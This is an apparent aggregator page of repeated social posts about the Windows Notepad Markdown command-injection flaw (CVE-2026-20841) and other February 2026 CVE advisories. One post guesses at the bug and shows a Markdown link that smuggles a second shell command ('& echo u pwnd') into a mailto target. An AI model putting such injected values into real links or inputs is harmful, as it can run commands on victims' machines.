##updated 2026-02-11T15:16:16.997000
101 posts
3 repos
https://github.com/BTtea/CVE-2026-20841-PoC
@odo
From https://www.cve.org/CVERecord?id=CVE-2026-20841
> Improper neutralization of special elements used in a command ('command injection') […]
So maybe notepad just runs something like
```cmd
start "" $link_src
```
And when you write something like
```md
[trust me bro](mailto:foo@bar.baz & echo u pwnd)
```
in your md ...
It maybe translates to something like
```cmd
start "" mailto:foo@bar.baz & echo u pwnd
```
I don't know what the actual vuln is. But sounds like something like the above. Hopefully not that simple. 🤞
##@mttaggart for those utilizing MS defender stack here is a detection for it:
https://github.com/0x-cde/Threat-Hunting-with-KQL/blob/main/Queries/CVE-2026-20841.md
⚠️ Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network
##moves.
- TikTok launches opt-in Local Feed in the US using precise location data.
- Windows Notepad remote code execution vulnerability CVE-2026-20841.
- Europe’s hypersonic program: Mach 6 test completed in Norway as defense autonomy advances. [2/2]
https://winbuzzer.com/2026/02/11/microsoft-patches-notepad-rce-vulnerability-cve-2026-20841-xcxwbn/
Microsoft Patches High-Severity Notepad Remote Code Execution Flaw
#Cybersecurity #MicrosoftNotepad #Microsoft #Windows #MicrosoftWindows #Windows11 #PatchTuesday #SecurityPatches #WindowsVulnerability #Vulnerability
##Here's my CVE-2026-20841 PoC.
(Not really, but I have a feeling it's something that rhymes with this)
##The Vibe-coding Era at Microsoft is going greaaaaaaaat.... https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Looks like the vibe coders at Microsoft forgot to add "don't introduce command injection vulnerabilities" to their prompts?
##🔥 Notepad colpito da vulnerabilità critica
Notepad in Windows 11 espone milioni di PC a un attacco remoto: la vulnerabilità CVE-2026-20841 sfrutta il supporto Markdown per eseguire codice malevolo con un semplice clic su un link
https://gomoot.com/notepad-di-windows-11-colpito-da-vulnerabilita-critica/
##Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Imagine being jail to an operating system where even the blast editor is vulnerable
Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
https://www.cve.org/CVERecord?id=CVE-2026-20841
Keep contributing and funding alternatives for all of us.
##Notepad++: alcune mie versioni erano vulnerabili
MS Notepad: hold my beer
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Windows Notepad App Remote Code Execution Vulnerability https://lobste.rs/s/kp7jlq #windows
https://www.cve.org/CVERecord?id=CVE-2026-20841
Remote Code Execution on notepad
FUCKING NOTEPAD
Microsoft, keep your claws out of the working code! Notepad does NOT need upgrades to be anything else than an entirely plain text editor.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Just A+ work all around.
"Windows Notepad App Remote Code Execution Vulnerability"
##Falha crítica no Bloco de notas (CVE-2026-20841). Um invasor poderia colocar um link malicioso em um arquivo Markdown que, ao ser clicado pela vítima, executaria códigos remotamente. Quem mandou macular a simplicidade do Bloco de notas? Já tem correção disponível. https://www.cve.org/CVERecord?id=CVE-2026-20841&utm_medium=social&utm_source=manualdousuario
##Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##1976:
In fünfzig Jahren werden wir fliegende Autos haben.
2026:
Schwere Sicherheitslücke in ... Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Что ни день, то повод посмеяться над микрослопом.
Была обнаружена уязвимость, которая позволяет злоумышленникам запускать произвольный код на компьютере жертвы через БЛОКНОТ, сука. Серьёзность уязвимости помечена как ВЫСОКАЯ
##Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Notepad.exe RCE Vulnerability 8.8
Are you shitting me?
Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##Notepad... NOTEPAD!
CVE Record: CVE-2026-20841
##What the.. how?
Notepad was the simplest application on windows. What have they done to it?
##Really looking forward to the analysis of this remote code execution vulnerability in [checks notes] Windows Notepad
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Microsoft hat NOTEPAD.EXE jetzt erfolgreich kaputt gespielt.
##Notepad RCE? https://cvefeed.io/vuln/detail/CVE-2026-20841
##lmao, it's 2026 and we have spaceships in the heliosphere, high-resolution images of Pluto and a permanent robotic presence, in orbit and on ground, on Mars.
plus remote code execution in fucking Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##age-verification concerns.
- Windows security flaws: multiple 2026 CVEs (Notepad RCE CVE-2026-20841; MSHTML; CVE-2026-21510/13/19/25/33) and ongoing Patch Tuesday updates.
- AI and work: productivity boosts but rising cognitive load and burnout; AI adoption altering job markets and roles.
- Open/indie web and OSS: growing use of Pixelfed, Matrix, Zulip; open-source Discord alternatives (Stoat chat); broader Fediverse/indie-web movement.
- Space/AI funding and policy: [2/3]
Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Comments: https://news.ycombinator.com/item?id=46971516
lol
Windows Notepad App Remote Code Execution Vulnerability
##📜 Latest Top Story on #HackerNews: Windows Notepad App Remote Code Execution Vulnerability
🔍 Original Story: https://www.cve.org/CVERecord?id=CVE-2026-20841
👤 Author: riffraff
⭐ Score: 63
💬 Number of Comments: 12
🕒 Posted At: 2026-02-11 06:15:33 UTC
🔗 URL: https://news.ycombinator.com/item?id=46971516
#news #hackernewsbot #bot #hackernews
Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
#Windows #sécurité
Oh misère, y'a même des failles RCE dans le Notepad de Windows ???
https://www.cve.org/CVERecord?id=CVE-2026-20841
Windows Notepad App Remote Code Execution Vulnerability - https://www.cve.org/CVERecord?id=CVE-2026-20841
##Windows Notepad App Remote Code Execution Vulnerability
##Windows Notepad App Remote Code Execution Vulnerability
##Notepad was nice because all it did was display some text. Not necessarily very well, but it was better than whatever combination of decisions lead to “Windows Notepad App Remote Code Execution Vulnerability”.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Microsoft: I have made Notepad✨
Security researchers: You fucked up a perfectly good plaintext editor is what you did. Look at it. It's got RCEs.
##They finally did it. Microsoft has successfully over-engineered a text editor into a threat vector.
This CVE is an 8.8 severity RCE in Notepad of all things lmao.
Apparently, the "innovation" of adding markdown support came with the ability of launching unverified protocols that load and execute remote files.
We have reached a point where the simple act of opening a .md file in a native utility can compromise your system. Is nothing safe anymore? 😭
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
#noai #microslop #microsoft #windows #programming #writing #windows11 #enshittification #cybersecurity #infosec #technology
##What is it, Microsoft shited their pants again lol :neofox_laugh_tears:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
Even this page didn't load properly :neofox_laugh_tears:
#Microsoft #windows
@stefan@akko.lightnovel-dungeon.de @volpeon@icy.wyvern.rip Nope.
Here is the CVE
https://www.cve.org/CVERecord?id=CVE-2026-20841
microsoft: we have made a new notepad.exe
everyone else: you f***ed up a perfectly good text editor, is what you did. look at it. it's got RCE.
##CVE-2026-20841 = Windows Notepad App Remote Code Execution Vulnerability
"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files."
lolwut
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##someone earlier today said "RCE in Notepad" and i was like "haha funny" and then someone ELSE said RCE in Notepad and then i was like youve gotta be fucking kidding me
##Kein Kommentar. Wäre nicht zitierfähig. Aber...
RCE im Notizblock?! Wie verstrahlt- uhm "vibed" ist das denn?!
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##https://www.cve.org/CVERecord?id=CVE-2026-20841
##Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
Notepad
over a network
Microsoft Windows 11 enshitification continues with its screwing up what was a perfectly functional text file editor - Notepad - adding layers of garbage on it and congratulations, Notepad, yes, bleeding Notepad now has a code execution vulnerability on it.
https://www.cve.org/CVERecord?id=CVE-2026-20841
It's only the Windows 11 Notepad they've screwed up - anyone on any earlier version, which for safety's sake should only be online if it is Windows 10 with the Extended Service Updates (new one just today), is fine.
##RE: https://tech.lgbt/@solonovamax/116049115040950367
https://www.cve.org/CVERecord?id=CVE-2026-20841
WHAT'S THE NETWORK ELEMENT in FUCKING NOTEPAD
WHAT BIT COULD IT BEEEEEEEE
edit: ahhh! the notepad thing might not be copilot. the bug is that a URL in a markdown file can actually be a sploit that runs stuff as the user. so this may not be an ai story. dammit.
##"Windows Notepad App Remote Code Execution Vulnerability"
That's it: I'm going back to AppleWorks, on my Apple IIe.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##@m4rc3l CVE-2026-20841 #c3d2leaks
##From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##A vulnerability in Notepad 🤦♂️
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
@mttaggart for those utilizing MS defender stack here is a detection for it:
https://github.com/0x-cde/Threat-Hunting-with-KQL/blob/main/Queries/CVE-2026-20841.md
⚠️ Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network
##https://winbuzzer.com/2026/02/11/microsoft-patches-notepad-rce-vulnerability-cve-2026-20841-xcxwbn/
Microsoft Patches High-Severity Notepad Remote Code Execution Flaw
#Cybersecurity #MicrosoftNotepad #Microsoft #Windows #MicrosoftWindows #Windows11 #PatchTuesday #SecurityPatches #WindowsVulnerability #Vulnerability
##Here's my CVE-2026-20841 PoC.
(Not really, but I have a feeling it's something that rhymes with this)
##The Vibe-coding Era at Microsoft is going greaaaaaaaat.... https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##🔥 Notepad colpito da vulnerabilità critica
Notepad in Windows 11 espone milioni di PC a un attacco remoto: la vulnerabilità CVE-2026-20841 sfrutta il supporto Markdown per eseguire codice malevolo con un semplice clic su un link
https://gomoot.com/notepad-di-windows-11-colpito-da-vulnerabilita-critica/
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Imagine being jail to an operating system where even the blast editor is vulnerable
Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
https://www.cve.org/CVERecord?id=CVE-2026-20841
Keep contributing and funding alternatives for all of us.
##Windows Notepad App Remote Code Execution Vulnerability https://lobste.rs/s/kp7jlq #windows
https://www.cve.org/CVERecord?id=CVE-2026-20841
Remote Code Execution on notepad
FUCKING NOTEPAD
Microsoft, keep your claws out of the working code! Notepad does NOT need upgrades to be anything else than an entirely plain text editor.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Just A+ work all around.
"Windows Notepad App Remote Code Execution Vulnerability"
##Falha crítica no Bloco de notas (CVE-2026-20841). Um invasor poderia colocar um link malicioso em um arquivo Markdown que, ao ser clicado pela vítima, executaria códigos remotamente. Quem mandou macular a simplicidade do Bloco de notas? Já tem correção disponível. https://www.cve.org/CVERecord?id=CVE-2026-20841&utm_medium=social&utm_source=manualdousuario
##1976:
In fünfzig Jahren werden wir fliegende Autos haben.
2026:
Schwere Sicherheitslücke in ... Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Что ни день, то повод посмеяться над микрослопом.
Была обнаружена уязвимость, которая позволяет злоумышленникам запускать произвольный код на компьютере жертвы через БЛОКНОТ, сука. Серьёзность уязвимости помечена как ВЫСОКАЯ
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Notepad.exe RCE Vulnerability 8.8
Are you shitting me?
Notepad... NOTEPAD!
CVE Record: CVE-2026-20841
##What the.. how?
Notepad was the simplest application on windows. What have they done to it?
##Really looking forward to the analysis of this remote code execution vulnerability in [checks notes] Windows Notepad
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Microsoft hat NOTEPAD.EXE jetzt erfolgreich kaputt gespielt.
##Notepad RCE? https://cvefeed.io/vuln/detail/CVE-2026-20841
##lmao, it's 2026 and we have spaceships in the heliosphere, high-resolution images of Pluto and a permanent robotic presence, in orbit and on ground, on Mars.
plus remote code execution in fucking Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Comments: https://news.ycombinator.com/item?id=46971516
lol
Windows Notepad App Remote Code Execution Vulnerability
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
#Windows #sécurité
Oh misère, y'a même des failles RCE dans le Notepad de Windows ???
https://www.cve.org/CVERecord?id=CVE-2026-20841
Windows Notepad App Remote Code Execution Vulnerability
##Windows Notepad App Remote Code Execution Vulnerability
##Notepad was nice because all it did was display some text. Not necessarily very well, but it was better than whatever combination of decisions lead to “Windows Notepad App Remote Code Execution Vulnerability”.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##Microsoft: I have made Notepad✨
Security researchers: You fucked up a perfectly good plaintext editor is what you did. Look at it. It's got RCEs.
##They finally did it. Microsoft has successfully over-engineered a text editor into a threat vector.
This CVE is an 8.8 severity RCE in Notepad of all things lmao.
Apparently, the "innovation" of adding markdown support came with the ability of launching unverified protocols that load and execute remote files.
We have reached a point where the simple act of opening a .md file in a native utility can compromise your system. Is nothing safe anymore? 😭
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
#noai #microslop #microsoft #windows #programming #writing #windows11 #enshittification #cybersecurity #infosec #technology
##@stefan@akko.lightnovel-dungeon.de @volpeon@icy.wyvern.rip Nope.
Here is the CVE
https://www.cve.org/CVERecord?id=CVE-2026-20841
microsoft: we have made a new notepad.exe
everyone else: you f***ed up a perfectly good text editor, is what you did. look at it. it's got RCE.
##CVE-2026-20841 = Windows Notepad App Remote Code Execution Vulnerability
"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files."
lolwut
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##https://www.cve.org/CVERecord?id=CVE-2026-20841
##Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code over a network.
Notepad
over a network
Microsoft Windows 11 enshitification continues with its screwing up what was a perfectly functional text file editor - Notepad - adding layers of garbage on it and congratulations, Notepad, yes, bleeding Notepad now has a code execution vulnerability on it.
https://www.cve.org/CVERecord?id=CVE-2026-20841
It's only the Windows 11 Notepad they've screwed up - anyone on any earlier version, which for safety's sake should only be online if it is Windows 10 with the Extended Service Updates (new one just today), is fine.
##RE: https://tech.lgbt/@solonovamax/116049115040950367
https://www.cve.org/CVERecord?id=CVE-2026-20841
WHAT'S THE NETWORK ELEMENT in FUCKING NOTEPAD
WHAT BIT COULD IT BEEEEEEEE
edit: ahhh! the notepad thing might not be copilot. the bug is that a URL in a markdown file can actually be a sploit that runs stuff as the user. so this may not be an ai story. dammit.
##"Windows Notepad App Remote Code Execution Vulnerability"
That's it: I'm going back to AppleWorks, on my Apple IIe.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##@m4rc3l CVE-2026-20841 #c3d2leaks
##From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##A vulnerability in Notepad 🤦♂️
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
updated 2026-02-10T21:52:01.987000
1 posts
RE: https://infosec.exchange/@ozu/116041085922526875
Another another vuln. CVE-2025-52436
##updated 2026-02-10T21:51:48.077000
1 posts
Critical FortiOS Vulnerability Exposes Networks to LDAP Authentication Bypass
Fortinet has issued a major security alert warning of a serious flaw in its FortiOS firewall software. The vulnerability, tracked as CVE-2026-22153, allows attackers to bypass LDAP authentication entirely—meaning hackers can gain access without needing a valid username or password. This type of breach could compromise sensitive enterprise networks and VPN connections, putting critical data at…
##updated 2026-02-10T21:51:48.077000
1 posts
🚨 CVE-2026-25993 (CRITICAL): EverShop <2.1.1 allows unauthenticated SQL injection via url_key in category handling. Upgrade to 2.1.1+ or enforce input validation now! https://radar.offseq.com/threat/cve-2026-25993-cwe-89-improper-neutralization-of-s-6994a1ac #OffSeq #SQLInjection #Infosec #EverShop #Vuln
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-25947 - High (8.8)
Worklenz is a project management tool. Prior to 2.1.7, there are multiple SQL injection vulnerabilities were discovered in backend SQL query construction affecting project and task management controllers, reporting and financial data endpoints, re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25947/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25947 - High (8.8)
Worklenz is a project management tool. Prior to 2.1.7, there are multiple SQL injection vulnerabilities were discovered in backend SQL query construction affecting project and task management controllers, reporting and financial data endpoints, re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25947/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-1848 - High (7.5)
Connections received from the proxy port may not count towards total accepted connections, resulting in server crashes if the total number of connections exceeds available resources. This only applies to connections accepted from the proxy port, p...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1848/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1848 - High (7.5)
Connections received from the proxy port may not count towards total accepted connections, resulting in server crashes if the total number of connections exceeds available resources. This only applies to connections accepted from the proxy port, p...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1848/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-21352 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21352/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21352 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21352/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-1507 - High (7.5)
The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1507 - High (7.5)
The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-21349 - High (7.8)
Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21349/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21349 - High (7.8)
Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21349/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##updated 2026-02-10T21:31:42
2 posts
🟠 CVE-2026-21344 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21344/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21344 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21344/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:41
2 posts
🟠 CVE-2026-21347 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21347/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21347 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21347/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:41
2 posts
🟠 CVE-2026-21353 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21353/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21353 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21353/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:37
2 posts
🟠 CVE-2026-21341 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21341/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21341 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21341/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:36
2 posts
🟠 CVE-2026-21343 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21343/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21343 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21343/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:29
12 posts
A critical zero-day vulnerability in Microsoft Word, identified as CVE-2026-21514, has been disclosed. The flaw is being actively exploited in the wild.
https://cybersecuritynews.com/microsoft-office-word-0-day-vulnerability/
🟠 CVE-2026-21514 - High (7.8)
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21514/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21514
CVE-2026-21514
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21514
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
